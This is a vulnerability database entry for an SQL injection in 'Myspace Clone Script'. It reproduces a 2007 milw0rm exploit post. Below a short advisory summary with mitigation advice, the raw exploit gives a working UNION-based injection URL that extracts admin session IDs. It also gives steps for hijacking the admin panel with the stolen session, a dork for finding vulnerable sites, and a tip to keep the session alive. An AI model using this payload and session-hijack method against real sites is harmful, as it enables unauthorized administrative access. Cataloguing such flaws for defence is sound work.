Myspace Clone Script SQL Injection Vulnerability

vendor:

Myspace Clone Script

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Myspace Clone Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Myspace Clone Script SQL Injection Vulnerability

The vulnerability allows an attacker to pull admin session id's from the database and gain unauthorized access to the admin area. The exploit uses a UNION-based SQL injection technique.

Mitigation:

The vendor should sanitize user input to prevent SQL injection. Users should ensure that they are using the latest version of the script to mitigate the vulnerability.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    Myspace Clone Script SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: datecomm.com
DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"


DESCRIPTION: 
pull admin session id's from the database, then visit admin area.


EXPLOITS:
index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,sess_id,7,8,9,10/**/FROM/**/admin/*


NOTE/TIP:
after executing the Injection you will see a SessionID.

Use the session id in the below URL:
admin.php?pg=users&adsess=SESSION_ID

example: 
http://www.site.com/admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123

Do Not Click Logout! as it will delete the sessionid from the DB.


GREETZ: milw0rm.com, H4CK-Y0u.org!


--==+================================================================================+==--
--==+		    Myspace Clone Script SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-11-13]